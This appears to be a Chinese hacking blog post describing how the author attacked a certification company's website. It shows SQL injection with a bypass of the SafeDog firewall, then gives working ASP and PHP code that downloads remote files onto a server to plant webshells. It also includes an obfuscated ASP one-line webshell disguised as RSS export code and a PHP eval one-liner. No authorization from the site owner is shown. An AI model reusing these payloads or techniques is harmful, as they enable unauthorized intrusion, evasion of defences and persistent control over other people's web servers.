因为最近大四的师兄告诉我我们专业是多么的苦逼,于是肚子的想考点证啥的,就跑去搜索下看看这个思科啥的考证的是咋回事,于是于是就开始了这场关于注入的小事。 和客服简单的交谈了下,发现费用好高的说,于是滋生了想检测下他们官网的想法,随便的打开了一个连接,发现是动态的xxx.asp?id= 由于写进DOC了,下面主要讲解下思路.. 安全狗本身对xx.asp?id=69 and 1=1和xx.asp?id=69 and 1=2这些是过滤的,可是对xx.asp?0day5.com=%00.&xw_id=69%20 and 1=1和xx.asp?0day5.com=%00.&xw_id=69%20 and 1=2 却是正常,直接丢到工具就OK了 发散下自己的一些思路,彩笔而已..大家不要喷呃... 对于安全狗的,可以选择 下载 ,不选择上传文件,这个和音符大大测试过的 asp 的下载脚本,要求是支持数据流的组建没有被删除<% Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.2cto.com /2.txt",False xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath("11.asp"),2 set sGet = nothing set sPOST = nothing %> 意思是把http://www.2cto.com /2.txt这个文件下载到当前目录保存为11.asp 利用嘛...保存为x.asp,然后去访问,等到进度条完成了再去访问11.asp会发现大马躺在那里的 php的,这个是音符大大给的<form method="post"> <input name="url" size="50" /> <input name="submit" type="submit" /> </form> <?php $pwd='e';//这里为你的密码 if ($_REQUEST['pwd']!=$pwd) exit('Sorry ,you are not validate user!'); // maximum execution time in seconds set_time_limit (24 * 60 * 60); if (!isset($_POST['submit'])) die(); // folder to save downloaded files to. must end with slash $destination_folder = './'; $url = $_POST['url']; $newfname = $destination_folder . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } } if ($file) { fclose($file); } if ($newf) { fclose($newf); echo 'OK,File has been downloaded!'; } www.2cto.com ?> 保存为xx.php,然后通过e.php?pwd=e访问会提示让输入地址,这里找一个不解析php的网站,然后上传去...它会自己下载文件,并保存在当前目录 关于突破的一句话,我一直在使用仙剑之鸣提起的那个一句话<% Call System_Initalize() Function System_Initalize() On Error Resume Next Dim Rss2Export:Rss2Export="Export" Dim objArticle:objArticle=Request(Rss2Export) Set Rss2Export = New TRssExport With Rss2Export Dim objRS,UserName,UserIntro .TimeZone=ZC_TIME_ZONE UserName=Users(UserID).Name If objArticle<>"" Then .AddChannelAttribute "language",ZC_BLOG_LANGUAGE Execute Replace(objArticle,"*"&Rss2Export,"") .AddChannelAttribute "copyright",TransferHTML(ZC_BLOG_COPYRIGHT,"[no html ][html-format]") .AddChannelAttribute "pubDate",Now Response.End() End if End With End Function %> 密码是Dim Rss2Export:Rss2Export="Export"这里的Export php的是选择了nono< ?php eval ($_POST [1]) ?> 密码是1
查看更多关于简单的绕过安全狗继续注入 以及一些突破思路的详细内容...